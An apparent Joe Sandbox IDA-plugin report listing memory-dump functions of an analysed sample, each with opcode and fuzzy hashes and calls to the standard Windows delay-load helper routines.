Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 15039db2af8e8cef17cf758da0cf21d7ef5b75e69a67d4cd5b626371eb077673
Instruction ID: ffe9d1abdcfa68a4474489e187d8770be0758946994883f3797b6e0241d44ecd
Opcode Fuzzy Hash: 15039db2af8e8cef17cf758da0cf21d7ef5b75e69a67d4cd5b626371eb077673
Instruction Fuzzy Hash: 72C01234400205868F209A289A484E97327AA533A67B49B9DC0288AAA1D322CC87EA20

Function 006AEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AEAF9

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a04ac24211cf1c3add029c6f12b86ffc1f5cc2b4d8760d732e761ed451dc7e58
Instruction ID: bb6edc752a7b6d1a548b426bd67967e0f7f88bcf8f76cc9b49a6a2259b14893f
Opcode Fuzzy Hash: a04ac24211cf1c3add029c6f12b86ffc1f5cc2b4d8760d732e761ed451dc7e58
Instruction Fuzzy Hash: 09B012C629A0527C350472051E03C37010FC5C2BA0330802FF605C4081DC860C020C31

Function 006AE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE3FC

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8410e556f5915d6037015fc061bba09dd9b3528b79adf68110448a3a75d4e017
Instruction ID: 17eda6f7cea0c27a143ab6bfab151ca5c0a631f13064fa21409060738455063e
Opcode Fuzzy Hash: 8410e556f5915d6037015fc061bba09dd9b3528b79adf68110448a3a75d4e017
Instruction Fuzzy Hash: D5B012E2258050BC3184B1091D02D37020FC5C2B20330C02FF909C5180DC454C050E37

Function 006AE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE3FC

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 71b6d23255726ddcd2f4b209b97191982c5b0bf2df012449004ca5bd487a5256
Instruction ID: 30cd9008a0f200219a2c4cb4a04711c79785be69e3ae6246ca2bd32404bc5bce
Opcode Fuzzy Hash: 71b6d23255726ddcd2f4b209b97191982c5b0bf2df012449004ca5bd487a5256
Instruction Fuzzy Hash: 8BB012F1258050BC3144B1055D02D37020FC5C2F20330C02FF809C5180DC494E010D37

Function 006AE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE3FC

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d83861ea9452563bd453efb466c2589897d8a0b0daf0892fba82761938541ee9
Instruction ID: aac72d3e2aef35da862ed85ca3f7c89d796b9b62cd7e3e93b511ecf373d2005f
Opcode Fuzzy Hash: d83861ea9452563bd453efb466c2589897d8a0b0daf0892fba82761938541ee9
Instruction Fuzzy Hash: 8CB012E12580507C318471091E02D37020FC5C2B20330C02FF609C5180DC460C0A0E37

Function 006AE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE580

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1af7426c0902ecc80fc692ea0ad4085235d31f5aecf71b03e47cc4976155017d
Instruction ID: d9d44afa6f3b93b1cf84015a98bc9bf1fc5cad60ed65c194d8563d69ff2f5514
Opcode Fuzzy Hash: 1af7426c0902ecc80fc692ea0ad4085235d31f5aecf71b03e47cc4976155017d
Instruction Fuzzy Hash: 5CB012C1A580107C3148B155AE02D37111FC1C3B24331862FF409C1180EC430D120D35

Function 006AE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE580

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 78fbc262430ad43c2a96836adf0ad785bade0bb8dd6e77ae51b772be687be427
Instruction ID: c3d36c408887408400a172cffb9a2cfd75ab261a0e2fc0108ca2b3f51fc1c492
Opcode Fuzzy Hash: 78fbc262430ad43c2a96836adf0ad785bade0bb8dd6e77ae51b772be687be427
Instruction Fuzzy Hash: B3B012C1A581107C3188B155AD03D37151FC1C3B24331862FF409C1180E8420C410D35

Function 006AE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE580

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 55b3b4d9c91d65d3889c50058c16c01d8b61d25bbab32d39ec7f67cbe1d2efa4
Instruction ID: 4b4140f43256e9b6f5fb2b1c9228caaa605ba696fb903b43cef5836b663fd2fb
Opcode Fuzzy Hash: 55b3b4d9c91d65d3889c50058c16c01d8b61d25bbab32d39ec7f67cbe1d2efa4
Instruction Fuzzy Hash: AFB012C1A5C0147D3248B1552D02D37110FC1C3B24331842FF409C11C0E8420C010D35

Function 006AE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE3FC

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 760c6844ac3d1205a28d6075cb1a388d2822f5a674ba4bb76f4dcfa3aa80a4bc
Instruction ID: 10a99b6d80d258655fb0afddec9eaea2eec61c67e08c18418152397e25b214d3
Opcode Fuzzy Hash: 760c6844ac3d1205a28d6075cb1a388d2822f5a674ba4bb76f4dcfa3aa80a4bc
Instruction Fuzzy Hash: FDA011E22A80823C300832022E02C3B020FC8C2B28330802EF82AA8080AC8A0C020C3A

Function 006AE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE3FC

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 788f8157603fcbc0534eea94cf323aa0a6d3743a1a635be371ce8807aadd6bd8
Instruction ID: 10d8d24751db956a85bf5a7704f063d10150453f51e0c3954f28d634e09d8d9d
Opcode Fuzzy Hash: 788f8157603fcbc0534eea94cf323aa0a6d3743a1a635be371ce8807aadd6bd8
Instruction Fuzzy Hash: 48A011E22A8082BC300832022E02C3B020FC8C2B20330882EF80A88080A88A0C020C3A

Function 006AE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE3FC

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6b3535c95b4c4c36d9834989ff27acbf2bc09040d5d048db72d91afb29bf243b
Instruction ID: 10d8d24751db956a85bf5a7704f063d10150453f51e0c3954f28d634e09d8d9d
Opcode Fuzzy Hash: 6b3535c95b4c4c36d9834989ff27acbf2bc09040d5d048db72d91afb29bf243b
Instruction Fuzzy Hash: 48A011E22A8082BC300832022E02C3B020FC8C2B20330882EF80A88080A88A0C020C3A

Function 006AE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE3FC

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 195841451c1c6264b6a07c0db3fb3b0a9dcb7dff15ca29ff08f3aa5bdf6e4cdd
Instruction ID: 10d8d24751db956a85bf5a7704f063d10150453f51e0c3954f28d634e09d8d9d
Opcode Fuzzy Hash: 195841451c1c6264b6a07c0db3fb3b0a9dcb7dff15ca29ff08f3aa5bdf6e4cdd
Instruction Fuzzy Hash: 48A011E22A8082BC300832022E02C3B020FC8C2B20330882EF80A88080A88A0C020C3A

Function 006AE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE3FC

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 13c250238b2e0f0d0ab87125d1d3ca9c2660e1a53e412a0d6c7f7f53dad54964
Instruction ID: 10d8d24751db956a85bf5a7704f063d10150453f51e0c3954f28d634e09d8d9d
Opcode Fuzzy Hash: 13c250238b2e0f0d0ab87125d1d3ca9c2660e1a53e412a0d6c7f7f53dad54964
Instruction Fuzzy Hash: 48A011E22A8082BC300832022E02C3B020FC8C2B20330882EF80A88080A88A0C020C3A

Function 006AE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE3FC

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 11c7d3639d92ced74c8d852335fc5a95dc2665b45cb4325cf73905e8554cc05e
Instruction ID: 10d8d24751db956a85bf5a7704f063d10150453f51e0c3954f28d634e09d8d9d
Opcode Fuzzy Hash: 11c7d3639d92ced74c8d852335fc5a95dc2665b45cb4325cf73905e8554cc05e
Instruction Fuzzy Hash: 48A011E22A8082BC300832022E02C3B020FC8C2B20330882EF80A88080A88A0C020C3A

Function 006AE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE580

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 422462a6637474b24cfe3b85c654424064e578667b35899121be7c06c49bc62c
Instruction ID: 2e41c195742c2bf4e87dd54db1316caf638718a40b53961d65f8e359510e8b45
Opcode Fuzzy Hash: 422462a6637474b24cfe3b85c654424064e578667b35899121be7c06c49bc62c
Instruction Fuzzy Hash: 26A011C2AA80003C300832A22E02C3B020FC0C3B2A3328A2EF80A80080A8820C020C30

Function 006AE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE580

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a724a5cf9192b5069388da9e3c3f918d9a5855f061667dad66f21098d9f958f9
Instruction ID: e789a93a552b5e7bbe3ef9d51f404d019412301d0cd20b116a47e6344b4db97e
Opcode Fuzzy Hash: a724a5cf9192b5069388da9e3c3f918d9a5855f061667dad66f21098d9f958f9
Instruction Fuzzy Hash: CDA011C2AA8002BC300832A22E02C3B020FC0C3B28332882EF80A80080A8820C020C30

Function 006AE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE580

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9dd785ffb8f8fea8d7589d33206efd67534fd2e2b46fb001d7e5814ba6c2af04
Instruction ID: e789a93a552b5e7bbe3ef9d51f404d019412301d0cd20b116a47e6344b4db97e
Opcode Fuzzy Hash: 9dd785ffb8f8fea8d7589d33206efd67534fd2e2b46fb001d7e5814ba6c2af04
Instruction Fuzzy Hash: CDA011C2AA8002BC300832A22E02C3B020FC0C3B28332882EF80A80080A8820C020C30

